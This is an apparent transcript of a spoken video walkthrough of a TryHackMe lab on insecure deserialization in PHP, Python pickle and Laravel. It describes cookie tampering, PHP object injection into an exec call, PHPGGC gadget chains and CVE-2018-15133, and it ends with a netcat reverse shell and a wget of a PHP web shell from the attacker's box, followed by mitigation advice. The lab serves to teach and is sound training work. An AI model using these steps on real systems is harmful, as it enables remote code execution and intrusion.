Hi everybody, good morning. I'm doing insecure, where is it? Insecure deserialization, advanced server-side attack, part of web application pen testing. I noticed there's a couple of rooms I didn't do video from them. I'm trying to finish. So insecure deserialization. Get in-depth knowledge of the deserialization process and how it poses a vulnerability in web apps. Of course, now we have the attack box and machine. This is my attack box. I start the machine. That's the IP of the machine. I don't think there is a port 80, but let's try and see what's happening there. Okay, that's fine. I have my terminal. So user supply input has this is, I think it's a free room. Let's confirm. Free room, so we can go straight to the labs. As you can read, user supplied input has consistently been a catalyst for vulnerabilities, posing persistent threat across numerous platforms and applications, exploiting user input from SQL injection to cross-site scripting is a well-known challenge in securing web applications. Another less understood but equally dangerous vulnerability associated with user input is insecure deserialization. And secure deserialization exploits occur when an application trusts serialized data enough to use it without validating or its authenticity. This trust can lead to disastrous outcomes as attacker manipulates serialized object to achieve remote code execution. But basically the same story. User input, always check user input. Learning objective throughout this room, you will gain a comprehensive understanding of the following key concepts: how the serialization and deserialization process work, potential risk to web application, exploitation technique, mitigation measures. Prerequisites, okay, some web work, protocol, top 10, you can do this room if you want. With connect the machine, let's go there. So basically, the whole story of serialization is you find it in cookies, you find it in cookies, application that saves stuff in the database, because sometimes the structure of we have an example here. For example, if you have a data like an array like that, you want to save it, and if you save just text, you can't really have an idea if a 42 is a number or a string or something. So that's why the serialization comes. So it's way to take the data, an object, stream the bytes and save it, something like that, and then there's a reverse. So you make sure the format of whatever data you enter the serialize and go back. In serialization is a process of transmitting an object state into human readable or binary format, or mix of both, that can be stored and transmitted. The whole story is this. So data doesn't lost, the structure easy to save and send and doesn't get lost, and reconstructed as when required. The capability is essentially an application where data must be transferred between different parts of the set. Nowadays also you can use JSON for these things. In PHP, the function that do is serialize. For example, if you have this list, make sure we test, we not just read. So we have a PHP script there. Let's play with it. So let's run a PHP script -s localhost. Let's call it in 8800. Doesn't matter. Just let's call serial.php. So let's see what happens now if I run this script. Let's save this one there. Let's go to another window so we can have all the information, so we don't just read, we can practice what we're looking for. So if I do PHP serial, now I what? Yeah, it create a file called note. Unless you can see the note there. If I cut note, so you can see what it did. So you can see the value, so you can see what he was doing. We just tell him that the title is my note and the content of the file. So look how serialization, it means if I send this data, it doesn't get lost. It's clear what is the title was things, and you can go now to understand, for example, what this means. If you look, for example, the A2 array with two elements, so it tells us is an array has two elements, array type, 8 mean an array, 2 the number of key value pair, S5, S is for string, usually I for integer, and you have 5, so is one, a title is character 1 2 3 4 5, string of length 5, S for string, 5 character of the title the actual string, and then another thing to 11 because this is my th, that's 12, 1 2 3 4 5 6 7 8 9 10 12 string 11. And then you go back, you can see S7, the content, I tell you it's a content, it's not title, string of length 7, S15, welcome, that's the content, and so basically, yeah. So that's what the function serialize did. So it transferred this array. So now when you send it, you can send this or save like that. So if you save it this way, it keep its format than if you save it this way. So basically that's what serialization in a lot, you can say a simpler term. That's kind of a deserialization is reversing what happened. Imagine this is an example of this code length, you can read about it. So for example here, following our previous example, we have the node text. Let's take that script. So if I go out, I got deserialize. Let's call it deserial, doesn't matter, because now we already have that our node. So we have serialize the content. So if I go now, PHP deserialize. Now you can see how it gives from it give you the title, so it's clear what's the title. It give you the content which is there, so the information is clear. So we have basically the same things. A specific incident involving serialization in vulnerability. Here it tells some history about them. You have a log 4J vulnerability. The log is there was a lot of talk about this. There's a room also on TryHackMe. This is the log4j vulnerability. This is a room in TryHackMe for it. Impact vulnerability facilitates remote code execution. We have another CVE for WebLogic, Oracle WebLogic Server. We have Jenkins. Okay, there's a couple of them for serialization because especially Java, this one was too much noise about it when it happened. What is the function used in PHP for serialization? No, we already PHP for function. PHP code use clearly what it use a serialize function. I'm not sure the answer. If you ask for the function, usually it have the double bracket. What is the base code for vulnerability 4852? 4852 is 48. WebLogic. If you search WebLogic, it comes Oracle Serial Alert for CV4552. I don't see it in this page until when you search for it. If I go to the database CVE452, remember these different scores: CVS version 4, version 3, and version 2. Version 4, not version 3 will tell you it's of 9.8. Version 2 it tells you 7.5, which is exactly what the room is expecting as an answer. It expects that one. Now, does serialization allow only saving to byte system? No, it also did binary and byte and things like that. So this one is nay. Serialization format, are we still not in the labs? Oh, are we going to the labs now? While different we have basically here in this room we're more targeting PHP and Python, unlike other common vulnerabilities that exploit the immediate process of user input, and secure deserialization probably involve in deeper interaction with the application or the core logic. Yeah, this is one of the things about this serialization. It's not just send data. You need to understand the part of the code. Here they tell us PHP serialization is using this function. Already talk about it. This function covers PHP object array into byte stream representing the object data instructor. The resulting byte stream can include various data types such string, array, object, making it unique. Let's now they give us this example. This is the class for the note. I think the application TryHackMe. We have a public class notes content. In our note application, when you use a save a note, we serialize the note using a serialized note. It's called the note. We have the text, then serialize the note. The application and the PHP test. Let's go to PHP test. So we have the PHP test function that we have here. So if I say uh, just testing, so the assumption is serialized note, so it gives me that string is same thing. So we have the array, no, object 5. What exactly that 5 for? I'm confused now. This part indicates that the serialized data represent an object of the class note which has one property. Yeah, the property 1. That 5. In my explanation, I forgot about it now. What? It's an array that has two elements. Uh, 1, 2. Where did 5 from? 1, 2. No. Is the number of this part indicates that C data represent. O is an object. Yeah. So the one that we had before, when we get an A is for an array, not an object. Okay. A7, of course, as seen before, is a string with the 7 S for string character, I for okay, then same thing as 14 is for welcome whatever you use. Magic PHP provides several magic methods that play a crucial role for serialization process. A few of the important ones: sleep. This method is called an object before serialization. Wake up. This method is invoked upon deserialization. This is where the key happens when you start exploiting. Serialize as PHP 7.4. This method enables you to customize the serialization data by returning an array representing the object serialized from. Okay, and serialize to this compare with that one. Okay, in Python we use, there was a last room of TryHackMe, I think, to use pickle. There's another room I remember. It was when you check the cookie, you see what all these numbers, and then you realize it's a pickle. A pickle is not secure. There is not advised to use it. For example, here that's an example of Python. Creating a Python processor can note class. This class manage the list and if a code. Pickle them the first ones. This is the way for Python for it. Of course, we're using base64. Serialized data is binary and not safe for display. That usually always, especially in Python, you get this base64 datas. So the encoding. Let's get an example. Our example is in 5000 port. We're done with PHP. Let's go to the Python. So write your note. Here I am. So you can do pickle note and it give you in base64. If you have base64, you can just, if you are in the attack box, you can just go to chef, or you can just go here we're done with these things. You can just echo base 64 minus d, and oh, the white is not decoding correctly. Let's see what you can see who am I, but like it's some binary or something. Huh. Oh, this the binary data. Where is it? Note pickle successfully. That's the binary data. So if I take this binary data and push it there and click in pickle note, it gives me the data. So that's when you remember TryHackMe room was one before, because when you check the cookie, you see these zeros like that, and then you realize it's a pickle. So when you see these numbers like that in a cookie's, high chance is a Python pickle. Pickling, when this string is pickle, it's converted into binary format that is not human readable. This binary format contains information about data type, the data itself. Basics for encoding this binary form, of course, then encode into basics for string. In Exploitation serialization format, we discuss how this critical function is implemented in PHP and Python. PHP uses serialize and unserialize function. Python employ pickle. Beyond those two language, serialization is common. For example, Java Objective-C is fascinating with serializable interface, allowing object to convert it into byte streams and vice versa. Which language also you're talking about? Modern .NET application to use system text JSON, system XML serialization for XML task, reflecting a shift toward safer. Most standardized data, Ruby offer Marshall. Where is Marshall? Yeah, that's part of Ruby. If you Ruby fan. So let's go. So we can go to the lab. What is the basic phone code output after pickling the string? You got it in Python. You got it. You got it. So let's copy that. Now, what is the output after after serialization? The string you got it in PHP. Oh, what was the function that we have here before? PHP test. You got it. Yeah, but this one you can guess it for PHP. It's not like. What is the renewed binary serialization mode in using Ruby? That's one we talk about it. That's Marshall. Identification. After doing serialization across different programming languages, we now transition into critical aspect of cybersecurity, exploiting and mitigation vulnerability related to serialization. One of the things is access to secure code, to source code. When access to the source code is available, identifying serialization can be more straightforward because you're looking for the function and serialize or pick or load and things like that. Black box testing, it means no access to source code. When auditing application without access to source code, the challenge lies in deducing how the process data based solely on external observation and interaction. Basically, here you just like go to your web browser, you just go to inspect for sake of argument, you go to storage, look for your cookies if it's zeros or something. We don't have cookies for this one, that's fine. Analyze server response, error messages, for example, certain error you can see, for example, you relate in the but it's rare to see it in server response, only CTFs. Examine cookies. Yeah, cookies is one of the things that's why you always, when you do CTF, you go looking around there, or check your network too to see what's going on. Like now it's saved.note PHP file. visit who index.php. Okay, what we supposed to do here? What's the question? Visit the URL and identify what is the user defined function. They talk about it here. Yeah, sometimes you look for pentest, they look for this, because some people, when they develop their application, when they use an editor in Linux, usually it saves the file, a backup copy of it. So sometimes you just go there and you find it. So now the function that you use for, what's the question again? For serialization. No, hello. Yeah, see, this is like the custom one being used. Now let's go now exploitation update properties. Now, updating property of an object. In this task, we'll explore a practical example in PHP using simple node sharing application, which in the case 1. So we're done of this. Let's go to case 1. Let's close this for a moment. So whenever you have an app, you just do test. If I do save, it's a test. If I click share, so please subscribe to share note. As we said, when we do these things, one of the things, you just go to storage. Let me put this higher, and then you see this random number there. Whenever you see random numbers, you know where to go. You can just go there, and if it's not detect automatic, the best chance it's base 64. Test the base 64, and then we found what interesting part, and we found something very interesting here. So if you look here, we found object nodes, 3. We have string for user, we have guest, so we can assume this is the role. Your level is guest. Oh, that's the role. No, sorry, the user is guest, the role is guest, is subscribed is 0. So we can see the old checks. Let's follow what TryHackMe is saying here. Well, because we have the node, we have the user, we have the role, we have is subscribed, the classes, and then yeah, if you can share if you are a subscriber. So same as we did this. So exploiting the vulnerability serialized cookie after decoding the base 64, we did that. We got A5. So this is represent an object with a class name nodes, which has 3 properties. And we got this information. Now let's explore the vulnerability. To explore it, we just can take this one, and I can just put that there. I can remove there. I get 2 base 64, and I just change this one to 1. Sorry, to 1, and I can just do the traditional way we do the cookies. We can just make sure. So if we share here, we still set them. I'm not. So if I put the new cookie, now I'm able to subscribe. So basically, this one is straightforward when it's a simple cookie a practice. So there's no special about it. What is the default role? Default role we already we passed it. The default role is guest. Now let's get more complex bit part, which one? Exploitation object injection. Object injection is vulnerability that arise from a insecure data deserialization of application. It occurs when entrusted data is deserialized into an object, allowing attacker to manipulate the serialized data. As we know, the vulnerability arises from process of serialization. Yeah, usually the deserialization part. To exploit a PHP object, yeah, you need this wake up. The application should include a class filtering PHP magic method because they work with the serialization. Can be for malicious. Now they give us this example of PHP. Of course, now if you read this PHP, from the first thing you can see these things require most. You need when you see this, and then we have the PHP script there. That's the test. They said the test PHP. We can see a public backlash assumption is not our IP. So the question is, can we change this? Can we modify this? The class is malicious data, and you go here in the command and you can see there is exec. So basically, can we call this and with our command, and then we can run the command here? Yes, we can, because remember what happened. This line, when you include it, it means this function, the serialise function, know about test.php. It know about it. So when serialise run, it know about this. It know this class. That's why in the exploit we just use the class. So if we go back to my little writing, um, a test.php include a malicious user data class existing in PHP memory. Attacker sends serialized malicious data object via decode, and serialize see the serialized data is for class malicious data. PHP look, do I know this class? Yes, from the required statement, because we have an include. PHP reconstruct the object and call wake up, that's the malicious attacker malicious command exists. This is like a safety run later on, but before we do safety, so basically, yeah, so the idea is use this class and inject our, so in the above code through a secure deserialization, it's possible to manipulate the properties of an object, including altering our command. So we can say, create our own that, and then, because this is just a template, it's not like a fix. So now if we prepare the payload, so basically we're using this PHP, this call this. So now, because now we want to target that function, let's say clear vmix exploit.php. So we have 4.4. Let's make our IP. .10, my IP 125.167. Before we forget, let's open another window. What did I do? Let's go nc minus lvnp my 1.62. So basically, remember, we still have that PHP server. We can just PHP exploit. And I don't need the. Guys, sorry, I was just confusing you. We don't need this. Why I did this? I don't need. I'm not hosting things. Sorry, we don't need these things. You can just run it straight. Sorry, I got confused with different rooms. This is if we need to run some PHP server. Sorry, we don't need these things for this room. I just got confused. So what exactly are we supposed to do now? Which where's the app? Oh, the case 2. This app is under case 2. We still didn't do that testing. Before we do that, we done all this. Let's do case 2. If you do case 2, it'll tell you please provide either encode or decode. So if I do encode, no, not like that. Encode equal, for example, test, it will reply like that: serialized data base So if I give it the base 64, the full one, and use decode, and it give me my test. So we're cool. So we can take ours now. We can just take the one that we created now. We don't need that save. I wonder why it confused about different rooms. Remove that one, decode, and if you do that, it frees and we get our shell. So it means what happened here when it include this one, the serialize function. Now, but the malicious the class, and because we created somehow it goes and we get our reverse shell ID. What exactly the question we're supposed to get from this room? The flag and who am I? Who am I is there already. Who am I? W data. The flag is cat flag.php. Okay, like and the user the is W. Yeah, it's a normal. It's a W data PHP Apache. Uh, now let's go. Of course, for security reason, usually what you can do is serialize function only allow specific classes, like for example, because the problem here that test PHP was including that malicious class or don't allow any classes, so you can play in that type of things. So now if I go sorry, automation script. Now if they told us about PHPGGC, the gadget. PHP is a tool for generating gadget chain used in PHP object injection attacks, specifically tailored for exploiting vulnerabilities related to PHP object serialization and deserialisation. So that's the tool we use. Gadget chain, provide library of gadget and all of that. Let's practice it. Let's copy a link. Let's go to it so we can get the copy of it. Oh, let's not hang. Let's go. Just Control C. Uh, is not installed. Is it installed here? PHP? No. Okay. Git clone cd phpg clear ls. So that's the PHP. How do you need a PHP to run it? Let's see what's the command to use it. Okay, this is the file phpg chain. You run it straight with -l. Okay, we don't need to do that. PHP -l, it give you all of them. For example, in our case, you get all this noisy information. Which one? An example, cake PHP less than -l, cake PHP. It give you, for example, here you can use this one less than equal 39, or you can do it RC2. So it all these command function call command. So this one is like it has already the payload you can use. What else we can do? Exploiting web application. We'll practice now. Laravel for this CAV 2018-15133. Vulnerability is triggered when Laravel deserialize and pack and trusted data from XSRF token. It's also on security if you want to read about it. Of course, to do this, you need an API key. In this room, the assumption is we got this, either you got it from GitHub because someone left it in .env file, or social engineer or something. So this one, you should have it. App is an 8089. Let's go to that 8089 port. think we're done with this. We're not coming back to this room. 8089. Yeah, you can do its Laravel. You can do if you go to the storage, you can get, and we get xserv anti-cheating. This one is supposed to be, but this one you can't. Now we got this. Even if you put it there, it's not like. So you got that's Laravel. It's not a base 64, I think. Let's see if it works. Oh, it's a base 64. You have an IV, you have value, you have max. So this is like a whole protection happening here. Yeah, this we can identify web application. Here they tell you it's if you want to get more bot enumeration, there's a different room for that. So for this, now we will go into detailed step-by-step exploitation. Remember, the assumption is such assumption 1 will require IP key through any attack vector such as social engineering. You can get IP. The key now is in get dash key. Let's get that key now. What up dash key? Sorry, not what the link is. Get key. So the assumption is we have the key. So we have this key. Now the next one is using the PHP. Why? Oh, he's put PHP there. Not necessary. Let's go here. Clear. Now we're looking for Laravel. And now is too many of them. Which Laravel we using? Moving forward, we can generate the payload using a various gadget. Each gadget has its relevance. So using RCE3 for because the assumption is we know the version, which is 5.6.29. Why is using IC3? Which one are we using? REC3. Oh, 550 to 5835. What version he said? 5.6. Okay. System. That's how we do. Laravel RC3 system and the command. Okay, clear. Let's Laravel. RCE3 system, and who am I? And that's what we get from same as these things. And height I try, I'm not really 100%, but that's how the language works. So eliminate a broadcast whatever we saw here. Yeah. This class handle event. Remember, you need to. That's why they said you need to because Laravel is open source. They can check these classes. So let's be clear on that. So it's not like it's a guessing here. So that's which topic would hold our comment. Who am I? We also manipulate the default channel and the customer create property that are twisted to create the asset. So now basically now as we already know, Laravel initially employed encrypted and serialized cookies to secure store session and CRSF token data using the same methodology for both. We already saw this because when we went to the Laravel we can see the XRF and then we have the app key, and then we can access the link CVE, and they said we already gave us. No, let's do it. So cve.php app key and the payload. So let's do up. Whoa. What's going on? What? So we have up key equal. So we got the idea. We have the key. And the payload equal. We got a payload from our. Why I'm getting confused now? What I was doing again? Oh yeah. Why is not giving me the encoder? Oh, minus B. I forgot the minus B. Oh, now we got the encrypted panel, so we can just take that one and we just paste it now in the. What the hell I did here? I didn't put the up key correctly. And payload equal up and this. No, the what's the name of the file? Oh, sorry guys. cve.php cve.php. Now we got it. And then what happened if I take this one and put it here and then refresh? What happened? Nothing. Okay. Okay, let's use the curl one. The idea here is to say now we can use curl response. We call curl the IP post, and then we do the token. Sorry guys, I'm trying to experiment. It's good to learn things to see what's going on. Why Firefox doesn't show me? So we have this one. Let's open another window. So basically we send in a post request to with our new token. What's our new token? This one. And then because we just had minus and 2 and the response would be in the front. Did we got a response? Don't worry about Faye, we got nothing. So head minus supposed to be so our things is not working. Tin, why is not working? XRF token supposed to be in EY. Did we got something wrong? No, I know what is wrong. We call the token is this one. And then we can do head no, sorry, head minus and 2. We're supposed to see, now you can see the response. Look, it's here. I'm very good question. Let's Let's go to our Laravel, play with it. How are you, my friend Laravel? What happens if I do this? But it would be in a response, so row. Let's get the storage cookie. Nice network. I don't think we can get it from Firefox. I think that's why using curl. So we have the user is root. So if we can, this is Java. For Java, your serial for Java, your serial is a widely recognized exploitation tool specific after. This is for Java. For this room, we are not using the Java one. You can, we're not testing. We don't have lab for it. Let's first. What is the vector for exploiting code? Code what? Let's come back to this one. PHP minus L. Oof, what the hell I did? PHP minus L. I'm getting confused for a moment. Let's do this. Let's see if I can find this thing. FR1 FR1 FR1, this one. So the vector is this function, toString. The next one, what is the output for mi? We already got it, it's root. And they said use uname minus r, so we can do uname minus r. We can do uname minus r, and then we can copy this and then come to our CVE. We can remove this payload there. We can do shift and remove that, paste a new one, then we get these new things. Then we can come to this this one. We can do, we only need this one, token. We get our new token there, so just copy it and then paste it there. Sorry guys. And then head minus, and let's see what happened, -3. And then we can see it's written here 0. I'm not sure if the 0 part of the answer. Let's test it. No, the 0 is not part of the answer. This is $5.15. Now how about we can get a shell? Let's get the shell. So if I want to do shell, because let's do a quick shell. Where is the shell table? Let's do the port 9001. Hold on, where is my friend NC? Okay, just do NC minus LVMP 9001. So we have that. What shell we can do? Let's do, is there encoding? Do base64 encoding so you don't have problem. If I copy that, let's see if I echo. I'm not sure if it does work, this one. Let's try it. Echo base 64 minus D. Let's try it. If it does work. We copy this. We can go to our payload. Let's remove our payload. Shift and delete. Paste. Control V. We got our new one. Then we can go to our curl. We need this function line. I don't need to delete, so just put there. And then I can copy my new things, paste, close. Let's see if it does work. Head minus n and 2 didn't work. Okay, let's do new trick. We're done with this. Okay, let's do new trick. Exploit.php. Oh, sorry. Vim shell.php. Let's get a full PHP shell. I don't know why it's not working that one, but let's get a PHP shell. Pentester monkey. Oh, not encoding. Just get a normal one. None. Copy. Oh, that's the. We didn't change the IP. It's possibly supposed to work. Let's try it again quickly. 167, 1010, 125, 167. Let's try that, the first one with the B64. We come back to you later on. Let's see if the problem was remove that, paste hours, get that line, copy. No. Head minus n2. No, it's not working. Okay, let's do the shell in PHP. Let's do this base64 is not working. Let's get let's do the old tricks, the PHP one, straightforward. PHP monkey, that one, not encoding, just get a normal one, copy it. Let's do that, and then let's do our server, python 3 minus m http.server, and then we can come here, and now we don't do this, we just do this. wget http 10.10. My attack box IP 21.10.10.125.167 8000 shell.php. Yeah, that's it. Let's copy that. Remove that. Oh, hold on. Payload equal and then we can go to this one. It did work for me before, yeah, so I'm not sure. Paste. Sorry, head minus and 3 or 2, whatever. Let's see our server, did it pick up anything? Okay, we got it. So we have the shell went through, was downloaded. So we can go now to this, and let's call our shell.php file. And we got the shell, where is it? Now we got shell id, ls, who am I? Oh, we are root. ls root, nice, nothing. ls home, what? The logs, disk, this one. Oh, inside the container or something. It's a docker environment variable. This var run. Okay guys, that's one way finally we got the shell. So you can practice a command if you want and get shell if you want. Okay, the next task is mitigation and measure. Of course, the mitigation, the risk associated with insecure deserialization is paramount in ensuring the security of the web application. By implementing effective defense measure, organization can significantly reduce the likelihood of exploitation and mitigate potential damage. We will discuss. Okay, red team pen tester. For code-based analysis, conduct a comprehensive review of the application's serialization mechanism. Look for the function, all of that. Vulnerability identification. Use static analysis tool to detect insecure deserialization vulnerabilities. Look for improper input validation and secure libraries, all of that. Fuzzing and dynamic analysis. Employ fuzzing technique to generate invalid and unexpected input. Data. Use dynamic analysis tool to monitor the application behavior. Error handling assessment. Evaluate how the application usually don't show the error at all. Secure code perspective. Avoid insecure serialization format. Avoid using inherently insecure serialization format like Java serialization. Choose safer alternative. Yeah, I was talking before. JSON and XML. Serialization uses only for your local application, so it doesn't interact. You don't take in data from user, it's just the app locally. Because JSON now XML have with a validation mechanism, avoid eval in exa. This is like a given. Input validation in outputting code implement stringent input validation to ensure that only expected data is accepted. Secure coding practices. Follow secure coding practices recommendation, all of that. Adherence to guideline. Establish secure coding guidelines specific to programming language framework. Now, is it a good practice? This one is like the you can say a joke question. Of course, eval is one of the dangerous one. As conclusion, in this room, and secure serialization has provided throughout understanding critical security, vulnerability, and its impact on web application. Next, we learned how to identify secure serialization vulnerability within application. Through practice exercise, we explore exploitation technique, including updating property. Finally, we discuss mitigation measure or Discord exit count. So guys, yeah, as I said, I'm trying to do the room. I didn't finish. There was a time here I didn't have a, premium subscription. I didn't do the videos for some of the rooms. So this is yeah, this is the end. If you want to practice getting the shell, maybe for practice, see what other option you can use here and why. For example, this didn't work. See how to make it work. let me know in the comment. Yeah, guys, that's the room. Thank you. If you like it, please like and subscribe to help the channel. And thank you very much and have a good day.